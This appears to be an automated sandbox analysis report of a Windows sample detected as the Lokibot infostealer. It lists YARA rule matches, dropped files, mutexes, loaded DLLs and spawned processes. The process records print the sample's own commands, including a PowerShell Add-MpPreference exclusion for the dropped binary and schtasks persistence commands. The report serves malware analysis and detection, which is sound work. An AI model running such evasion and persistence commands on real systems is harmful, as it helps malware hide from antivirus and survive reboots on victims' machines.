Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: gunzipped.exe PID: 6400, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: WiHDtnb.exe PID: 3220, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: WiHDtnb.exe PID: 6148, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: gunzipped.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WiHDtnb.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.cs	Security API names: _0020.SetAccessControl
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.cs	Security API names: _0020.AddAccessRule
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, h17c3NXtdNiUK364F8.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, h17c3NXtdNiUK364F8.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/13@0/1

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe

Code function: 12_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

12_2_0040434D

Source: C:\Users\user\Desktop\gunzipped.exe

File created: C:\Users\user\AppData\Roaming\WiHDtnb.exe

Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Mutant created: \Sessions\1\BaseNamedObjects\BWsWvjKaS

Source: C:\Users\user\Desktop\gunzipped.exe

File created: C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp

Jump to behavior

Source: gunzipped.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: gunzipped.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\gunzipped.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: gunzipped.exe

ReversingLabs: Detection: 18%

Source: C:\Users\user\Desktop\gunzipped.exe

File read: C:\Users\user\Desktop\gunzipped.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\WiHDtnb.exe C:\Users\user\AppData\Roaming\WiHDtnb.exe
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Process created: C:\Users\user\AppData\Roaming\WiHDtnb.exe "C:\Users\user\AppData\Roaming\WiHDtnb.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe"	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Process created: C:\Users\user\AppData\Roaming\WiHDtnb.exe "C:\Users\user\AppData\Roaming\WiHDtnb.exe"	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
